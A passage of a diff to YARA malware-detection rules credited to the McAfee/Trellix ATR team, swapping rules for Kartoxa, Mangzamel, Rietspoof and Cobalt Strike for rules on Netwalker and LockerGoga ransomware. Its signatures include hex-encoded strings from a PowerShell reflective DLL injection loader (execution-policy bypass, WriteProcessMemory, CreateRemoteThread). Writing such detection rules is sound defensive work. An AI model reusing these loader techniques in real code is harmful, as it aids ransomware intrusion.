??D1??8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B???? } + $pattern2 = { CCCCCCCCCCA1????????C3CCCCCCCCCCCCCCCCCCCC538B??????5533??5785??74??8B??????85??74??8B????85??74??C1????50E8????????83????89??85??74??8B????5633??85??74??5653E8????????83????85??74??8B????85??74??8D??????89??????5150E8????????83????85??74??8B????8B??8B??????89????FF????8B????463B??72??39????B9????????5E0F44??5F8B??5D5BC35F5D33??5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC535556578B??????85??74??83????74??8B????85??74??8B??????85??74??33??85??74??8B??????660F1F??????85??74??8B??53FF????E8????????EB??E8????????8D????8B??FF????8B??53FF??83????85??75??463B????72??5F5E5D33??5BC35F5E5DB8????????5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??56E8????????8B????50E8????????83????85??75??A1????????6A??83????5650E8????????83????85??75??56E8????????83????85??74??8D????66??????74??83????83????75??33??5EC383????74??A1????????6A??83????5150E8????????83????85??74??B8????????5EC3CCCCCCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??A1????????83??????74??8B??????85??74??56E8????????8B??????????83????83????75??83??????74??66????????75??0FB7??83????72??83????76??83????66??????76??6A??8D????5650E8????????83????85??74??B8????????5EC333??5EC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??A1????????83??????74??51E8????????8B??83????85??74??8B??????????6A??83????5651E8????????83????85??74??B8????????5EC356E8????????83????33??5EC3CCCCCCCCCCCCCC535556576A??E8????????8B??83????85??0F84????????8B??660F1F??????0FB7????83????51E8????????8B??83????85??74??0FB7????51FF????57E8????????83????83????????????74??A1????????83??????74??6A??83????5750E8????????83????85??74??E8????????8B????3B????74??6A??51E8????????8B??83????85??74??E8????????6A??538B????FF??E8????????538B??????????FF??57E8????????83????8B??03??85??0F85????????55E8????????83????E8????????6A??8B??????????FF??E9????????CCCCCCCCCCCCCC83????5533??565739??????????0F84????????8B??????85??0F84????????8B??????85??0F84????????53E8????????8B??????????FF??83??????8B??74??E8????????FF????8B??????????FF??89??????E8????????8D??????516A??8B??????????8D??????516A??57FF??85??74??8B??????89????83????74??E8????????8B??????????FF??2B??3D????????77??83??????75??5B5F5E8B??5D83????C3BD????????5B5F5E8B??5D83????C35F5E33??5D83????C383????558B??????85??0F84????????5333??5733??89??????89??????E8????????8D??????518D??????8B??????????5157576A??FF????FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????56E8????????8D??????518D??????8B??????????51FF??????FF??????6A??FF????FF??85??74??33??39??????76??8B??????0F1F??????????E8????????8B??????68????????FF????8B??????????FF??FF??89??????8D????????????5053E8????????8B??83????85??74??FF??????68????????E8????????83????89????474683????3B??????72??8B??????FF??????E8????????83????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??E8????????FF????8B??????????FF??463B??72??53E8????????83????5EE8????????8D??????516A??FF????8B??????????FF??5F5B85??74??8D??????50FF????E8????????83????E8????????FF????8B??????????FF??55E8????????83????33??5D83????C2????CCCCCCCCCCCCCCCCCCCCCCCC83????568B??????85??74??E8????????8D??????516A??8B??????????56FF??85??74??8D??????5056E8????????83????E8????????568B??????????FF??33??5E83????C2????CCCCCCCCCCCC83????83????????????5356570F84????????A1????????83??????0F84????????55E8????????68????????6A??6A??8B??????????FF??8B??89??????85??0F84????????660F1F????????????C7??????????????C7??????????????C7??????????????E8????????8D??????518D??????8B??????????518D??????516A??6A??6A??6A??55FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????E8????????8B??????8D??????518D??????8B??????????518D??????51FF??????566A??6A??55FF??85??0F84????????33??33??89??????39??????0F86????????0F1F??????????FF??E8????????83????85??75??FF????E8????????83????85??74??E8????????68????????FF??8B??????????55FF??89??????85??74??6A??E8????????8B??83????85??74??8B??????8D????????????5189????8B??????5389????E8????????8B??83????85??74??5568????????E8????????83????89????478B??????8B??????83????4089??????3B??????0F82????????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??0F1F????E8????????FF????8B??????????FF??463B??72??53E8????????83????FF??????E8????????83????E8????????68????????8B??????????FF??E9????????5D5F5E33??5B83????C2????CCCCCC83????53558B??????565785??0F84????????8B????8D??????516A??55C7??????????????FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????6A??8D??????6A??50E8????????33??83????B8????????66????????39??????0F8E????????8B??????8D??????5083????C7??????????????438B??89??????0F10??????8B??510F11??FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????8B??????8D??????C7??????????????33??52508B??FF????83????????0F84????????FF??????E8????????83????85??0F85????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????33?? } + $pattern3 = { CCCCCCCCCC558B??FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF?????????? } condition: - uint16(0)==0x5a4d and filesize <800KB and any of them + uint16(0)==0x5a4d and any of ($pattern*) } -rule TRELLIX_ARC_Kartoxa_Malware_Pdb : POS FILE +import "pe" + +rule TRELLIX_ARC_Netwalker_Signed : FILE { meta: - description = "Rule to detect Kartoxa POS based on the PDB" + description = "Rule to detect Netwalker ransomware digitally signed." author = "Marc Rivero | McAfee ATR Team" - id = "3d2dbf22-5d8f-5f19-9048-2d021ada22c8" - date = "2010-10-09" - modified = "2020-08-14" - reference = "https://securitynews.sonicwall.com/xmlpost/guatambu-new-multi-component-infostealer-drops-kartoxa-pos-malware-apr-08-2016/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_backdoor_katorxa_pdb.yar#L1-L25" + id = "6806b917-2e02-57e3-887a-b4c12db83653" + date = "2020-03-30" + modified = "2020-11-20" + reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L30-L47" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "86dd21b8388f23371d680e2632d0855b442f0fa7e93cd009d6e762715ba2d054" - logic_hash = "6e1810af386f3aada4cd1d72f76d8210d201808c8fe1d21d379ff1a825d93710" + logic_hash = "d78ed22771d7c93516375afb8fd2fd7baa40a357ec3c247939a10d11f80ae226" score = 75 quality = 70 - tags = "POS, FILE" - rule_version = "v1" - malware_type = "pos" - malware_family = "Pos:W32/Kartoxa" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $pdb = "\\vm\\devel\\dark\\mmon\\Release\\mmon.pdb" + tags = "FILE" + note = "The rule will hit also some Dridex samples digitally signed" condition: - uint16(0)==0x5a4d and filesize <200KB and any of them + uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "/CN=EWBTCAXQKUMDTHCXCZ" and pe.signatures[i].serial=="17:16:bb:93:fb:a9:a2:41:ba:a8:2e:c7:5e:ff:0c" or pe.signatures[i].thumbprint=="a4:28:e9:4a:61:3a:1f:cf:ff:08:bf:e7:61:51:64:31:1a:6f:87:bc") } -rule TRELLIX_ARC_Malw_Mangzamel_Trojan : TROJAN FILE +import "pe" + +rule TRELLIX_ARC_Netwalker : RANSOMWARE FILE { meta: - description = "Rule to detect Mangzamel trojan based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "ca77180f-6133-5edb-a36b-78bc6f18d80c" - date = "2014-06-25" - modified = "2020-08-14" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_mangzamel_trojan_pdb.yar#L1-L26" + description = "Rule based on code overlap in RagnarLocker ransomware" + author = "McAfee ATR team" + id = "80097a40-534a-5e1b-8fde-e4d832d76698" + date = "2020-06-14" + modified = "2020-11-20" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L49-L75" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "4324580ea162a636b7db1efb3a3ba38ce772b7168b4eb3a149df880a47bd72b7" - logic_hash = "bab103c671445e0ea916fae290689d30d45021bdca58a495ebd3d6ca9ca55051" + logic_hash = "8c56ebed9e097d294045de46942c708da9ba7e01475dcecb0c3d41fcc8004780" score = 75 quality = 70 - tags = "TROJAN, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/Mangzamel" - actor_type = "Cybercrime" + malware_type = "ransomware" actor_group = "Unknown" strings: - $pdb = "\\svn\\sys\\binary\\i386\\agony.pdb" - $pdb1 = "\\Windows\\i386\\ndisdrv.pdb" + $0 = {C88BF28B4330F76F3803C88B434813F2F76F2003C88B433813F2F76F3003C88B434013F2F76F2803C88B432813F2F76F4003C8894D6813F289756C8B4338F76F388BC88BF28B4328F76F4803C88B434813F2F76F2803C88B433013F2F76F400FA4CE} + $1 = {89542414895424108BEA8BDA8BFA423C22747C3C5C75588A023C5C744F3C2F744B3C2274473C6275078D5702B008EB3F3C6675078D5302B00CEB343C6E75078D5502B00AEB293C72750B8B542410B00D83C202EB1A3C74750B8B542414B00983C2} + $2 = {C8894D7013F28975748B4338F76F408BC88BF28B4340F76F3803C88B433013F2F76F4803C88B434813F2F76F3003C8894D7813F289757C8B4348F76F388BC88BF28B4338F76F4803C88B434013F2F76F400FA4CE} + $3 = {C07439473C2F75E380FB2A74DEEB2D8D4ABF8D422080F9190FB6D80FB6C28AD60F47D88AC6042080EA410FB6C880FA190FB6C60F47C83ACB754B46478A1684D2} + $4 = {8B433013F2F76F0803C88B432013F2F76F1803C88B0313F2F76F3803C88B430813F2F76F3003C88B433813F2F72F03C8894D3813F289753C8B4338F76F088BC8} + $5 = {F73101320E32213234329832E3320C332D334733643383339133A833BD33053463347C34543564358335AE36C3362937E9379A39BA390A3A203A443A183B2B3B} + $6 = {8B431813F2F76F4803C88B432813F2F76F3803C88B434013F2F76F200FA4CE0103C903C88B432013F2F76F4003C88B433013F2F76F3003C8894D6013F2897564} condition: - uint16(0)==0x5a4d and filesize <360KB and any of them + uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and all of them } -rule TRELLIX_ARC_Rietspoof_Loader : RANSOMWARE FILE +import "pe" + +rule TRELLIX_ARC_Win_Netwalker_Reflective_Dll_Injection_Decoded : RANSOMWARE { meta: - description = "Rule to detect the Rietspoof loader" - author = "Marc Rivero | McAfee ATR Team" - id = "f306e381-e2ae-528e-937b-aced72356d77" - date = "2024-09-01" - modified = "2020-08-14" - reference = "https://blog.avast.com/rietspoof-malware-increases-activity" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_rietspoof_loader.yar#L1-L22" + description = "Rule to detect Reflective DLL Injection Powershell Script dropping Netwalker, after hexadecimal decoded and xor decrypted " + author = "McAfee ATR Team" + id = "9562c0b9-e7ac-5b96-99cc-1df91cb617af" + date = "2020-05-28" + modified = "2020-11-20" + reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ | https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L77-L140" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "d72b58ff452070e03d0b25bc433ef5c677df77dd440adc1ecdb592cee24235fb" + hash = "fd29001b8b635e6c51270788bab7af0bb5adba6917c278b93161cfc2bc7bd6ae" + logic_hash = "e99c045f39e7933e877a4df7793aa5ea6be5a782bb079419501929ba99844dec" score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" + quality = 30 + tags = "RANSOMWARE" + rule_version = "v1" malware_type = "ransomware" - malware_family = "Loader:W32/Rietspoof" - actor_type = "Cybercrime" - actor_group = "Unknown" strings: - $x1 = "\\Work\\d2Od7s43\\techloader\\loader" fullword ascii + $api0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 20 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 22 29 5d } + $api1 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 22 29 5d } + $api2 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4c 6f 61 64 4c 69 62 72 61 72 79 41 22 29 5d } + $api3 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 22 29 5d } + $api4 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 46 72 65 65 22 29 5d } + $api5 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 22 29 5d } + $api6 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 6c 6f 73 65 48 61 6e 64 6c 65 22 29 5d } + $api7 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 22 29 5d } + $api8 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 22 29 5d } + $api9 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4f 70 65 6e 50 72 6f 63 65 73 73 22 29 5d } + $api10 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d } + $artifact0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d } + $artifact1 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 50 74 72 54 6f 53 74 72 75 63 74 75 72 65 } + $artifact2 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 52 65 61 64 49 6e 74 31 36 } + $artifact3 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73} + $artifact4 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73 20 2d 66 69 6c 65} + $artifact5 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 30 20 2c 20 4d 61 6e 64 61 74 6f 72 79} + $artifact6 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 31 20 2c 20 4d 61 6e 64 61 74 6f 72 79} + $artifact7 = {2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 50 61 73 73 20 2d 4e 6f 4c 6f 67 6f 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 4e 6f 45 78 69 74} + $artifact8 = {72 65 74 75 72 6e 20 5b 42 69 74 43 6f 6e 76 65 72 74 65 72 5d 3a 3a 54 6f 49 6e 74 36 34} condition: - uint16(0)==0x5a4d and all of them + 6 of ($api*) or ((3 of ($artifact*))) } -rule TRELLIX_ARC_MALW_Cobaltrike : BACKDOOR FILE +rule TRELLIX_ARC_Lockergogaransomware : RANSOMWARE FILE { meta: - description = "Rule to detect CobaltStrike beacon" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a7dae4c7-672e-58fb-8542-90fa90d991a4" - date = "2020-07-19" - modified = "2021-08-30" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_cobaltstrike.yar#L1-L38" + description = "LockerGoga Ransomware" + author = "Christiaan Beek - McAfee ATR team" + id = "bdf5da34-adf0-5731-820f-96511e647a83" + date = "2019-03-20" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_LockerGoga.yar#L1-L36" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "fc91d40c6544c7ab7c60b3cb8fc542bd4a6fac79dbe00cad8f612854f2a6dcd1" + hash = "ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f" + logic_hash = "165fa0fa044b2e0d2344626c2064162f23e13dc17310a772b703dbbe9457bd99" score = 75 quality = 70 - tags = "BACKDOOR, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/CobaltStrike" + malware_type = "ransomware" + malware_family = "Ransom:W32/LockerGoga" actor_type = "Cybercrime" actor_group = "Unknown" - hash1 = "f47a627880bfa4a117fec8be74ab206690e5eb0e9050331292e032cd22883f5b" strings: - $pattern_0 = { e9???????? eb0a b801000000 e9???????? } - $pattern_1 = { 3bc7 750d ff15???????? 3d33270000 } - $pattern_2 = { 8bd0 e8???????? 85c0 7e0e } - $pattern_3 = { 50 8d8d24efffff 51 e8???????? } - $pattern_4 = { 03b5d4eeffff 89b5c8eeffff 3bf7 72bd 3bf7 } - $pattern_5 = { 8b450c 8945f4 8d45f4 50 } - $pattern_6 = { 33c5 8945fc 8b4508 53 56 ff750c 33db } - $pattern_7 = { e8???????? e9???????? 833d????????01 7505 e8???????? } - $pattern_8 = { 53 53 8d85f4faffff 50 } - $pattern_9 = { 68???????? 53 50 e8???????? 83c424 } - $pattern_10 = { 488b4c2420 8b0401 8b4c2408 33c8 8bc1 89442408 } - $pattern_11 = { 488d4d97 e8???????? 4c8d9c24d0000000 418bc7 498b5b20 498b7328 498b7b30 } - $pattern_12 = { bd08000000 85d2 7459 ffcf 4d85ed } - $pattern_13 = { 4183c9ff 33d2 ff15???????? 